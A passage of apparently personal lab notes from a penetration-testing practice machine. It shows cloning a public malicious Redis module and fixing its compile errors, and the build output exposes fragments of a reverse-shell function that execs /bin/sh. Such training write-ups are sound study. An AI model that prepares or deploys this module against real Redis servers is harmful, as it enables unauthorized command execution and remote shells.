Malicious Redis Module
/Practice/Sybaris/3-Exploitation/attachments/{3DB70638-9035-4471-A881-E46C8E9E651E}.png)
A malicious Redis module is available online
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand ; cd RedisModules-ExecuteCommand
Cloning into 'RedisModules-ExecuteCommand'...
remote: Enumerating objects: 494, done.
remote: Counting objects: 100% (117/117), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 494 (delta 101), reused 100 (delta 100), pack-reused 377 (from 1)
Receiving objects: 100% (494/494), 203.32 KiB | 3.76 MiB/s, done.
Resolving deltas: 100% (289/289), done.Downloading the package
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand]
└─$ make
make -C ./src
make[1]: Entering directory '/home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/src'
make -C ../rmutil
make[2]: Entering directory '/home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/rmutil'
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../ -c -o util.o util.c
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../ -c -o strings.o strings.c
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../ -c -o sds.o sds.c
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../ -c -o vector.o vector.c
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../ -c -o alloc.o alloc.c
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../ -c -o periodic.o periodic.c
ar rcs librmutil.a util.o strings.o sds.o vector.o alloc.o periodic.o
make[2]: Leaving directory '/home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/rmutil'
gcc -I../ -Wall -g -fPIC -lc -lm -std=gnu99 -c -o module.o module.c
module.c: In function ‘DoCommand’:
module.c:16:29: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
16 | char *cmd = RedisModule_StringPtrLen(argv[1], &cmd_len);
| ^~~~~~~~~~~~~~~~~~~~~~~~
module.c:23:29: error: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration]
23 | if (strlen(buf) + strlen(output) >= size) {
| ^~~~~~
module.c:11:1: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
10 | #include <netinet/in.h>
+++ |+#include <string.h>
11 |
module.c:23:29: warning: incompatible implicit declaration of built-in function ‘strlen’ [-Wbuiltin-declaration-mismatch]
23 | if (strlen(buf) + strlen(output) >= size) {
| ^~~~~~
module.c:23:29: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
module.c:27:25: error: implicit declaration of function ‘strcat’ [-Wimplicit-function-declaration]
27 | strcat(output, buf);
| ^~~~~~
module.c:27:25: note: include ‘<string.h>’ or provide a declaration of ‘strcat’
module.c:27:25: warning: incompatible implicit declaration of built-in function ‘strcat’ [-Wbuiltin-declaration-mismatch]
module.c:27:25: note: include ‘<string.h>’ or provide a declaration of ‘strcat’
module.c:29:80: warning: incompatible implicit declaration of built-in function ‘strlen’ [-Wbuiltin-declaration-mismatch]
29 | RedisModuleString *ret = RedisModule_CreateString(ctx, output, strlen(output));
| ^~~~~~
module.c:29:80: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
module.c: In function ‘RevShellCommand’:
module.c:41:28: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
41 | char *ip = RedisModule_StringPtrLen(argv[1], &cmd_len);
| ^~~~~~~~~~~~~~~~~~~~~~~~
module.c:42:32: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
42 | char *port_s = RedisModule_StringPtrLen(argv[2], &cmd_len);
| ^~~~~~~~~~~~~~~~~~~~~~~~
module.c:48:38: error: implicit declaration of function ‘inet_addr’ [-Wimplicit-function-declaration]
48 | sa.sin_addr.s_addr = inet_addr(ip);
| ^~~~~~~~~
module.c:57:17: warning: argument 2 null where non-null expected [-Wnonnull]
57 | execve("/bin/sh", 0, 0);
| ^~~~~~
In file included from module.c:4:
/usr/include/unistd.h:572:12: note: in a call to function ‘execve’ declared ‘nonnull’
572 | extern int execve (const char *__path, char *const __argv[],
| ^~~~~~
make[1]: *** [<builtin>: module.o] Error 1
make[1]: Leaving directory '/home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/src'
make: *** [Makefile:18: module.so] Error 2The compilation consists of 2 parts; src and rmutil;
- It would appear that everything is compiled correctly for
rmutil - But it failed to compile the
srcfor several reasonssrc/module.cis missing a header; <string.h> for strlen, strcat- failed to call the inet_addr function, which is part of the <arpa/inet.h> header
Fix
/Practice/Sybaris/3-Exploitation/attachments/{5E22B1AF-841E-4994-9931-8A5B92B1675D}.png)
Appending the required headers; <string.h> and <arpa/inet.h>
Compile
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand]
└─$ make
make -C ./src
make[1]: Entering directory '/home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/src'
make -C ../rmutil
make[2]: Entering directory '/home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/rmutil'
make[2]: Nothing to be done for 'all'.
make[2]: Leaving directory '/home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/rmutil'
gcc -I../ -Wall -g -fPIC -lc -lm -std=gnu99 -c -o module.o module.c
module.c: In function ‘DoCommand’:
module.c:21:29: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
21 | char *cmd = RedisModule_StringPtrLen(argv[1], &cmd_len);
| ^~~~~~~~~~~~~~~~~~~~~~~~
module.c: In function ‘RevShellCommand’:
module.c:46:28: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
46 | char *ip = RedisModule_StringPtrLen(argv[1], &cmd_len);
| ^~~~~~~~~~~~~~~~~~~~~~~~
module.c:47:32: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
47 | char *port_s = RedisModule_StringPtrLen(argv[2], &cmd_len);
| ^~~~~~~~~~~~~~~~~~~~~~~~
module.c:62:17: warning: argument 2 null where non-null expected [-Wnonnull]
62 | execve("/bin/sh", 0, 0);
| ^~~~~~
In file included from module.c:4:
/usr/include/unistd.h:572:12: note: in a call to function ‘execve’ declared ‘nonnull’
572 | extern int execve (const char *__path, char *const __argv[],
| ^~~~~~
ld -o module.so module.o -shared -Bsymbolic -L../rmutil -lrmutil -lc
make[1]: Leaving directory '/home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/src'
cp ./src/module.so ./Practice/Sybaris/3-Exploitation/attachments/{C82D21E2-1B29-4651-AC48-6A8214D001E7}.png)
There are some warnings but it successfully compiled as the module is available